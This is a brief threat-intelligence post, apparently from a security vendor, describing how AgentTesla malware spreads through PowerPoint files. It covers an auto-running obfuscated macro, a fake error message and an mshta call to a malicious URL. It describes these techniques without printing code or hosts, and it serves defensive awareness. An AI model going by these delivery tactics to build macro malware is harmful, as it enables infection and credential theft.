AgentTesla Being Distributed via Sophisticated PowerPoint Files
When the PowerPoint file is run, a security notice appears, where the user selects whether or not to enable macros just like in the previous cases.
Selecting Enable macro runs the malicious macro.
When the malicious macro is executed, an error notice appears disguised as a PowerPoint error, making it difficult for users to notice malicious behaviors.
The malicious macro is executed automatically by the Auto_Open() function, and the data used for the malicious behavior is obfuscated.
Unobfuscating it shows the strings below, and the malicious command is executed via the shell function.
The malicious command executed by the malicious macro and just like in the previous cases, it approaches a malicious URL via mshta process to run additional scripts.
Featured Resources
View More Resources
CUSTOMERS
Credit Union Boosts Threat Prevention & Detection with Cymulate
Learn how a credit union automated live-data exercises to validate exposure, improve threat readiness, and streamline SecOps.
blog
Validating Cloud Threat Detection with Wiz Defend and Cymulate
Cymulate-Wiz integration enables proven cloud threat detection by simulating real attacks and verifying Wiz Defend.
blog
Kerberos Authentication Relay Via CNAME Abuse
A breakdown of Kerberos authentication relay using CNAME abuse and mitigation considerations.